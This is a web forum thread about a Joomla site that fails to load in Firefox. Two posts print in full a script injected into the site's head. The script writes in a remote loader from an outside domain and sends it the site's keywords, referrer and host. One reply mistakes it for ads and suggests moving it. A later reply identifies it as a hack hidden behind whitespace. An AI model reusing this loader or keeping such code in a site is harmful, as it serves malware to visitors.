MozillaZine

Firefox can't open my Joomla Website

Discuss how to use and promote Web standards with the Mozilla Gecko engine.
hack3rcon
 
Posts: 6
Joined: February 7th, 2016, 1:24 am

Post Posted March 9th, 2016, 7:20 am

Hello.
I have a website that made by Joomla 3.4.8 and my Mozilla version is 44.0.2 and I can't open my web site via it. My web site cna browse via Google Chrome and other.

Any idea?

Thank you.

DanRaisch
Moderator

User avatar
 
Posts: 117636
Joined: September 23rd, 2004, 8:57 pm
Location: Somewhere on the right coast

Post Posted March 9th, 2016, 7:26 am

Moving to Web Development.

What error are you seeing when trying to access that site?
What is the URL for that site?

hack3rcon
 
Posts: 6
Joined: February 7th, 2016, 1:24 am

Post Posted March 9th, 2016, 7:41 am

DanRaisch wrote:Moving to Web Development.

What error are you seeing when trying to access that site?
What is the URL for that site?


My web site is "bgcloob.com" and "labreport.ir".
It just show my header web site text and not show any content :(

Frenzie

User avatar
 
Posts: 2104
Joined: May 5th, 2004, 10:40 am
Location: Belgium

Post Posted March 9th, 2016, 7:59 am

The browser console isn't showing me any errors. However, it's obvious that one of the scripts on the page is responsible. In fact the page loads just fine while NoScript blocks the scripts from the artcorporation.by domain. I assume it's some kind of ads?

Regadless of what it is, just stick the relevant code
Code: Select all
<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://artcorporation.by/js/jquery.min.php?c_utt=G91825&c_utm='+encodeURIComponent('http://artcorporation.by/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>

all the way at the bottom, just before </body>, instead of at the top just before </head>. That way it won't block the page from loading.
Intelligent alien life does exist, otherwise they would have contacted us.

hack3rcon
 
Posts: 6
Joined: February 7th, 2016, 1:24 am

Post Posted March 9th, 2016, 8:03 am

Frenzie wrote:The browser console isn't showing me any errors. However, it's obvious that one of the scripts on the page is responsible. In fact the page loads just fine while NoScript blocks the scripts from the artcorporation.by domain. I assume it's some kind of ads?

Regadless of what it is, just stick the relevant code
Code: Select all
<script>var a='';setTimeout(10);if(document.referrer.indexOf(location.protocol+"//"+location.host)!==0||document.referrer!==undefined||document.referrer!==''||document.referrer!==null){document.write('<script type="text/javascript" src="http://artcorporation.by/js/jquery.min.php?c_utt=G91825&c_utm='+encodeURIComponent('http://artcorporation.by/js/jquery.min.php'+'?'+'default_keyword='+encodeURIComponent(((k=(function(){var keywords='';var metas=document.getElementsByTagName('meta');if(metas){for(var x=0,y=metas.length;x<y;x++){if(metas[x].name.toLowerCase()=="keywords"){keywords+=metas[x].content;}}}return keywords!==''?keywords:null;})())==null?(v=window.location.search.match(/utm_term=([^&]+)/))==null?(t=document.title)==null?'':t:v[1]:k))+'&se_referrer='+encodeURIComponent(document.referrer)+'&source='+encodeURIComponent(window.location.host))+'"><'+'/script>');}</script>

all the way at the bottom, just before </body>, instead of at the top just before </head>. That way it won't block the page from loading.


What is your idea to Solve it? Which line of my Joomla must be removed?

Frenzie

User avatar
 
Posts: 2104
Joined: May 5th, 2004, 10:40 am
Location: Belgium

Post Posted March 12th, 2016, 7:32 am

Unfortunately I don't know how to phrase that any differently or clearer. That piece of script should go just before </body> instead of just before </head>.
Intelligent alien life does exist, otherwise they would have contacted us.

jscher2000

User avatar
 
Posts: 10077
Joined: December 19th, 2004, 12:26 am
Location: Silicon Valley, CA USA

Post Posted March 14th, 2016, 5:42 pm

I saw a similar code block in another site earlier today, and I think it means your site is hacked. You normally would not use a huge block of white space unless you were trying to hide something:

view-source:http://www.labreport.ir/ (lines 84-191)

Check the files used to generate the head section of the page, and make sure Joomla is patched up to date.

FoxyEmma
 
Posts: 3
Joined: November 20th, 2015, 1:40 am

Post Posted March 18th, 2016, 3:36 am

I tried using Joomla for a while with my blog, but found it really confusing and it was also giving me issues with Firefox, not displaying the page properly and so on :? So I decided to switch and create a blog on here, this time using Wordpress, which turned out to be a lot mre user-friendly.

Return to Web Development / Standards Evangelism


Who is online

Users browsing this forum: No registered users and 1 guest